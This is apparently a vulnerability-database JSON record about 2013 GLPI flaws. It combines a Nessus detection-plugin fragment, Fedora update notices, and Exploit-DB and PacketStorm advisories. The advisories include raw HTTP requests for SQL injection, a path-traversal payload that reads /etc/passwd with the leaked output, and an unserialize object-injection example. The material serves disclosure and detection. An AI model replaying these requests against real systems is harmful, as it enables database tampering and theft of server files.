exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) 
audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"glpi-0.83.91-1.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2225", "CVE-2013-2226", "CVE-2013-2227"], "description": "GLPI is the Information Resource-Manager with an additional Administration-Interface. You can use it to build up a database with an inventory for your company (computer, software, printers...). It has enhanced functions to make the daily life for the administrators easier, like a job-tracking-system with mail-notification and methods to build a database with basic information about your network-topology. ", "modified": "2013-07-04T00:56:51", "published": "2013-07-04T00:56:51", "id": "FEDORA:9243121041", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: glpi-0.83.9.1-1.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2225", "CVE-2013-2226", "CVE-2013-2227"], "description": "GLPI is the Information Resource-Manager with an additional Administration-Interface. You can use it to build up a database with an inventory for your company (computer, software, printers...). It has enhanced functions to make the daily life for the administrators easier, like a job-tracking-system with mail-notification and methods to build a database with basic information about your network-topology. 
", "modified": "2013-07-05T02:09:51", "published": "2013-07-05T02:09:51", "id": "FEDORA:CBD3C22326", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: glpi-0.83.9.1-1.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T03:26:22", "description": "GLPI 0.83.8 - Multiple Vulnerabilities. CVE-2013-2226,CVE-2013-2227. Webapps exploit for php platform", "published": "2013-06-21T00:00:00", "type": "exploitdb", "title": "GLPI 0.83.8 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2227", "CVE-2013-2226"], "modified": "2013-06-21T00:00:00", "id": "EDB-ID:26366", "href": "https://www.exploit-db.com/exploits/26366/", "sourceData": "\r\nGLPI v0.83.8 Multiple Error-based SQL Injection Vulnerabilities\r\n\r\n\r\nVendor: INDEPNET Development Team\r\nProduct web page: http://www.glpi-project.org\r\nAffected version: 0.83.7 and 0.83.8\r\n\r\nSummary: GLPI, an initialism for Gestionnaire libre de parc informatique\r\n(Free Management of Computer Equipment), was designed by Indepnet\r\nAssociation (a non profit organisation) in 2003. GLPI is a free\r\nasset and IT management software package, it also offers functionalities\r\nlike servicedesk ITIL or license tracking and software auditing.\r\n\r\nDesc: Input passed via the POST parameter 'users_id_assign' in\r\n'/ajax/ticketassigninformation.php' script, POST parameter 'filename'\r\nin '/front/document.form.php' script, and POST parameter 'table' in\r\n'glpi/ajax/comments.php' script is not properly sanitised before\r\nbeing used in SQL queries. 
This can be exploited by a malicious\r\nattacker to manipulate SQL queries by injecting arbitrary SQL code\r\nin the affected application.\r\n\r\n\r\n======================================================================\r\n/inc/db.function.php:\r\n---------------------\r\n\r\n274: function countElementsInTable($table, $condition=\"\") {\r\n275: global $DB;\r\n276:\r\n277: if (is_array($table)) {\r\n278: $table = implode('`,`',$table);\r\n279: }\r\n280:\r\n281: $query = \"SELECT COUNT(*) AS cpt\r\n282: FROM `$table`\";\r\n283:\r\n284: if (!empty($condition)) {\r\n285: $query .= \" WHERE $condition \";\r\n286: }\r\n287:\r\n288: $result =$DB->query($query);\r\n289: $ligne = $DB->fetch_array($result);\r\n290: return $ligne['cpt'];\r\n291: }\r\n\r\n----------------------------------------------------------------------\r\n\r\n*** MySQL query error :\r\n***\r\nSQL: SELECT COUNT(*) AS cpt\r\nFROM `glpi_tickets`,`glpi_tickets_users` WHERE `glpi_tickets_users`.`tickets_id` = `glpi_tickets`.`id`\r\nAND `glpi_tickets_users`.`users_id` = \\'2\\'\\'\r\nAND `glpi_tickets_users`.`type` = \\'2\\'\r\nAND `glpi_tickets`.`is_deleted` = 0\r\nAND `glpi_tickets`.`status`\r\nNOT IN (\\'solved\\', \\'closed\\')\r\nError: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2'\r\nAND `glpi_tickets`.`is_deleted` = 0\r\n' at line 3\r\nBacktrace :\r\n/var/www/html/glpi/inc/db.function.php\u00a0:288\t\tDBmysql->query()\r\n/var/www/html/glpi/inc/commonitilobject.class.php\u00a0:362\t\tcountElementsInTable()\r\n/var/www/html/glpi/ajax/ticketassigninformation.php\u00a0:66\t\tCommonITILObject->countActiveObjectsForTech()\r\n/var/www/html/glpi/ajax/ticketassigninformation.php\r\n\r\n\r\n======================================================================\r\n/inc/document.class.php:\r\n------------------------\r\n\r\n1221: static function isValidDoc($filename) {\r\n1222: global $DB;\r\n1223:\r\n1224: $splitter = 
explode(\".\",$filename);\r\n1225: $ext = end($splitter);\r\n1226:\r\n1227: $query=\"SELECT *\r\n1228: FROM `glpi_documenttypes`\r\n1229: WHERE `ext` LIKE '$ext'\r\n1230: AND `is_uploadable`='1'\";\r\n1231:\r\n1232: if ($result = $DB->query($query)) {\r\n1233: if ($DB->numrows($result)>0) {\r\n1234: return Toolbox::strtoupper($ext);\r\n1235: }\r\n1236: }\r\n1237: return \"\";\r\n1238: }\r\n\r\n----------------------------------------------------------------------\r\n\r\n*** MySQL query error :\r\n***\r\nSQL: SELECT *\r\nFROM `glpi_documenttypes`\r\nWHERE `ext` LIKE \\'1\\'\\'\r\nAND `is_uploadable`=\\'1\\'\r\nError: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 3\r\nBacktrace :\r\n/var/www/html/glpi/inc/document.class.php\u00a0:1232\t\tDBmysql->query()\r\n/var/www/html/glpi/inc/document.class.php\u00a0:1088\t\tDocument::isValidDoc()\r\n/var/www/html/glpi/inc/document.class.php\u00a0:275\t\tDocument::uploadDocument()\r\n/var/www/html/glpi/inc/commondbtm.class.php\u00a0:878\t\tDocument->prepareInputForUpdate()\r\n/var/www/html/glpi/front/document.form.php\u00a0:99\t\tCommonDBTM->update()\r\n/var/www/html/glpi/front/document.form.php\r\n\r\n\r\n======================================================================\r\n/inc/dbmysql.class.php:\r\n-----------------------\r\n\r\n364: function list_tables($table=\"glpi_%\") {\r\n365: return $this->query(\"SHOW TABLES LIKE '\".$table.\"'\");\r\n366: }\r\n\r\n----------------------------------------------------------------------\r\n\r\n*** MySQL query error :\r\n***\r\nSQL: SHOW TABLES LIKE \\'%glpi_users\\'%\\'\r\nError: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1\r\nBacktrace 
:\r\n/var/www/html/glpi/glpi/inc\\dbmysql.class.php\u00a0:365\t\tDBmysql->query()\r\n/var/www/html/glpi/inc/db.function.php\u00a0:1182\t\tDBmysql->list_tables()\r\n/var/www/html/glpi/ajax/comments.php\u00a0:47\t\tTableExists()\r\n/var/www/html/glpi/ajax/comments.php\r\n\r\n======================================================================\r\n\r\n\r\nTested on: Microsoft Windows 7 Ultimate SP1 (EN) - Apache/2.4.3, PHP/5.4.7\r\n Linux CentOS 6.0 (Final) - Apache/2.2.15, PHP/5.3.3\r\n\r\n\r\n\r\nVulnerabilities discovered by Humberto Cabrera\r\n @dniz0r\r\n Zero Science Lab - http://www.zeroscience.mk\r\n\r\n\r\nAdvisory ID: ZSL-2013-5145\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5145.php\r\n\r\n\r\n09.05.2013\r\n\r\n----------------\r\n{1}\r\n\r\n\r\nPOST /glpi/ajax/ticketassigninformation.php HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nReferer: http://localhost/glpi/front/ticket.form.php\r\nContent-Length: 17\r\nCookie: PHPSESSID=5ducm98racrn23u3bl0kq8ap02\r\nConnection: keep-alive\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\nusers_id_assign=2{SQL_Injection}\r\n\r\n\r\n----------------\r\n{2}\r\n\r\n\r\nPOST /glpi/front/document.form.php HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/glpi/front/document.form.php?id=4\r\nCookie: PHPSESSID=5ducm98racrn23u3bl0kq8ap02\r\nConnection: keep-alive\r\nContent-Type: multipart/form-data; 
boundary=---------------------------19302542618340\r\nContent-Length: 1699\r\n\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"entities_id\"\r\n\r\n0\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"is_recursive\"\r\n\r\n0\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\ntest\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"comment\"\r\n\r\ntest\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"current_filepath\"\r\n\r\n\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"current_filename\"\r\n\r\n\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"filename\"; filename=1{SQL_Injection}\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"upload_file\"\r\n\r\n\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"link\"\r\n\r\ntest\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"documentcategories_id\"\r\n\r\n0\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"mime\"\r\n\r\napplication/octet-stream\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"update\"\r\n\r\nUpdate\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"_read_date_mod\"\r\n\r\n2013-06-14 20:27:56\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n4\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"_glpi_csrf_token\"\r\n\r\nf27853afa3e705b5042c0ae4d135679c\r\n-----------------------------19302542618340--\r\n\r\n\r\n----------------\r\n{3}\r\n\r\n\r\nPOST 
/glpi/ajax/comments.php HTTP/1.1\r\nHost: localhost\r\nProxy-Connection: keep-alive\r\nContent-Length: 59\r\nOrigin: http://localhost\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nAccept: */*\r\nReferer: http://localhost/glpi/front/planning.php\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: PHPSESSID=frk5prfmarsc9ebo1u751skkb2\r\n\r\nvalue=5&table=glpi_users{SQL Injection}&withlink=comment_link_uID302668907\r\n\r\n\r\n----------------\r\n\r\n#################################################################################################################\r\n\r\n\ufeff\r\nGLPI v0.83.7 (itemtype) Parameter Traversal Arbitrary File Access Exploit\r\n\r\n\r\nVendor: INDEPNET Development Team\r\nProduct web page: http://www.glpi-project.org\r\nAffected version: 0.83.7\r\n\r\nSummary: GLPI, an initialism for Gestionnaire libre de parc informatique\r\n(Free Management of Computer Equipment), was designed by Indepnet\r\nAssociation (a non profit organisation) in 2003. GLPI is a free\r\nasset and IT management software package, it also offers functionalities\r\nlike servicedesk ITIL or license tracking and software auditing.\r\n\r\nDesc: GLPI suffers from a file inclusion vulnerability (LFI) when input\r\npassed thru the 'itemtype' parameter to 'common.tabs.php' script is not\r\nproperly verified before being used to include files. 
This can be exploited\r\nto include files from local resources with directory traversal attacks\r\nand URL encoded NULL bytes.\r\n\r\n========================================================================\r\n/ajax/common.tabs.php:\r\n----------------------\r\n\r\n46: if (!isset($_REQUEST['itemtype']) || empty($_REQUEST['itemtype'])) {\r\n47: exit();\r\n62: $item = new $_REQUEST['itemtype'])();\r\n\r\n========================================================================\r\n\r\n\r\nTested on: Microsoft Windows 7 Ultimate SP1 (EN) - Apache/2.4.3, PHP/5.4.7\r\n Linux CentOS 6.0 (Final) - Apache/2.2.15, PHP/5.3.3\r\n\r\n\r\n\r\nVulnerabilities discovered by Humberto Cabrera\r\n @dniz0r\r\n Zero Science Lab - http://www.zeroscience.mk\r\n\r\n\r\nAdvisory ID: ZSL-2013-5145\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5145.php\r\n\r\n\r\n09.05.2013\r\n\r\n---\r\n\r\n\r\nPOST /glpi/ajax/common.tabs.php?_dc=1371234969991 HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nReferer: http://localhost/glpi/front/user.form.php?id=2\r\nContent-Length: 75\r\nCookie: PHPSESSID=5ducm98racrn23u3bl0kq8ap02\r\nConnection: keep-alive\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\ntarget=/glpi/front/user.form.php&itemtype=../../../../../../../../../../../../../../../../etc/passwd%00User&glpi_tab=Profile_User$1&id=2\r\n\r\n---\r\n\r\nroot:x:0:0:root:/root:/bin/bash\r\nbin:x:1:1:bin:/bin:/sbin/nologin\r\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\r\nadm:x:3:4:adm:/var/adm:/sbin/nologin\r\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\r\nsync:x:5:0:sync:/sbin:/bin/sync\r\n..\r\n..\r\n\r\n", "cvss": {"score": 7.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26366/"}, {"lastseen": "2016-02-03T03:47:54", "description": "GLPI 0.83.9 - 'unserialize()' Function Remote Code Execution Vulnerability. CVE-2013-2225. Webapps exploit for php platform", "published": "2013-07-01T00:00:00", "type": "exploitdb", "title": "GLPI 0.83.9 - 'unserialize' Function Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2225"], "modified": "2013-07-01T00:00:00", "id": "EDB-ID:26530", "href": "https://www.exploit-db.com/exploits/26530/", "sourceData": "Source: http://www.securityfocus.com/bid/60823/info\r\n\r\nGLPI is prone to a remote PHP code-execution vulnerability. \r\n\r\nAn attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. \r\n\r\nGLPI 0.83.9 is vulnerable; other versions may also be affected.\r\n\r\nAn attacker can exploit this issue using a web browser. 
\r\n\r\nThe following example URI is available: \r\n\r\nhttp://www.example.com/glpi/front/ticket.form.php?id=1&_predefined_fields=[XXXX]", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26530/"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:24", "description": "", "published": "2013-07-01T00:00:00", "type": "packetstorm", "title": "GLPI 0.83.9 Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2225"], "modified": "2013-07-01T00:00:00", "id": "PACKETSTORM:122242", "href": "https://packetstormsecurity.com/files/122242/GLPI-0.83.9-Code-Execution.html", "sourceData": "`======================================= \nAdvisory title: unserialize vulnerability in GLPI 0.83.9 \nProduct: GLPI 0.83.9 \nDiscovered by: Xavier Mehrenberger <at> Cassidian CyberSecurity \nVulnerable version: 0.83.9 \nTested: v0.83.9, 2013-06-21 \nFixed in repository: 2013-06-23 commits 21169 to 21180 \nCategory: Potential PHP code execution \nVulnerability type: [CWE-502] Deserialization of Untrusted Data \nCVE IDs: none yet \nBy: Xavier Mehrenberger \nCassidian CyberSecurity \nhttp://www.cassidiancybersecurity.com \n======================================= \n \n----- CVE-2013-XXXX Required configuration: No specific configuration required \n \nSteps to reproduce: \n* Issue a request to \nglpi/front/ticket.form.php?id=1&_predefined_fields=XXXX, \n* replacing XXXX with a serialized PHP object \n \nVulnerable code sample: \n--- file ticket.class.php, function showFormHelpdesk \nif (isset($options['_predefined_fields'])) { \n$options['_predefined_fields'] \n= \nunserialize(rawurldecode(stripslashes($options['_predefined_fields']))); \n--- \n \nWhen passing a non-existent empty serialized class (ex: class called \"exploit\" value \"O%3A7%3A%22exploit%22%3A0%3A%7B%7D\"), an error occurs, which is caught by the userErrorHandlerNormal function in toolbox.class.php. 
\n \nWhen a PHP object gets unserialized, its __wakeup() function is executed. When this object gets destroyed, its __destruct() function is executed (since PHP5). No class with such methods exists throughout the GLPI codebase. However, it might exist in a third-party library, as demonstrated by Stefan Esser [2]. \n \n \nMore information about this vulnerability class can be found at [1]. \n \nThe unsafe use of unserialize() has been fixed throughout the codebase in commits 21169 [3] to 21180. \n \nReferences: \n[1] https://www.owasp.org/index.php/PHP_Object_Injection \n[2] http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf \n \n`\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/122242/glpi-exec.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:53", "bulletinFamily": "software", "cvelist": ["CVE-2013-5640", "CVE-2013-5916", "CVE-2013-4339", "CVE-2013-5639", "CVE-2013-5692", "CVE-2013-1443", "CVE-2013-4340", "CVE-2013-5696", "CVE-2013-2225", "CVE-2013-5917", "CVE-2013-4315", "CVE-2013-5739", "CVE-2013-2226", "CVE-2013-5738", "CVE-2013-4338", "CVE-2013-5693"], "description": "PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.", "edition": 1, "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "id": "SECURITYVULNS:VULN:13311", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13311", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}